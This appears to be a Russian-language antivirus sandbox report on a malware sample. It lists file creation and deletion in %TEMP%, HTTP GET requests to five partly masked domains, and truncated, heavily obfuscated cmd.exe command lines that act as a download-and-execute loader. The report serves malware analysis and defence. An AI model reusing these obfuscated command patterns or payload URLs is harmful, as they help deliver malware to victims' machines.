Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c fo^r , /^F ; " delims=WHcDF tokens= +2 " ; %^G , ; ^In , ( , ' ; ft^^yPe ; ^| ; , Fin^^DSt^^R , ^^SH^^C ' ; ) , D^O , ; %^G, , ; js/vMh^Rrio+(^ , 4QTZE/c " , (^sET \}=d}5Nu...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\733.exe
Удаляет следующие файлы
- %TEMP%\733.exe
Сетевая активность
Подключается к
- 'ha#####-investment.com':80
- 'ek###hinova.com':80
- 'an##aic.ru':80
- 'ba##levs.ru':80
- 'fr##aen.org':80
TCP
Запросы HTTP GET
- http://ek###hinova.com/GqLhxQ
- http://ek###hinova.com/GqLhxQ/
- http://an##aic.ru/7Dq
- http://ba##levs.ru/Ib
- http://fr##aen.org/5w
UDP
- DNS ASK ha#####-investment.com
- DNS ASK ek###hinova.com
- DNS ASK an##aic.ru
- DNS ASK ba##levs.ru
- DNS ASK fr##aen.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c fo^r , /^F ; " delims=WHcDF tokens= +2 " ; %^G , ; ^In , ( , ' ; ft^^yPe ; ^| ; , Fin^^DSt^^R , ^^SH^^C ' ; ) , D^O , ; %^G, , ; js/vMh^Rrio+(^ , 4QTZE/c " , (^sET \}=d}5Nu...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ft^yPe | Fin^DSt^R ^SH^C
- '<SYSTEM32>\cmd.exe' /S /D /c" ftyPe "
- '<SYSTEM32>\findstr.exe' SHC
- '<SYSTEM32>\cmd.exe' , , ; js/vMhRrio+( , 4QTZE/c " , (^sET \}=d}5Nu'svIfCwRmgjSFP^kh$zib^)y^M+7^t^:^.^\lQr,/^ox =eq^3^WcGaLnp-;{D^(@)&& ; ; fOr , %v ; iN ; ( ^ 52 ,^ 3^9 ^ , ; ,^ ^+1^1 ^ ^ , ;^ ,^...
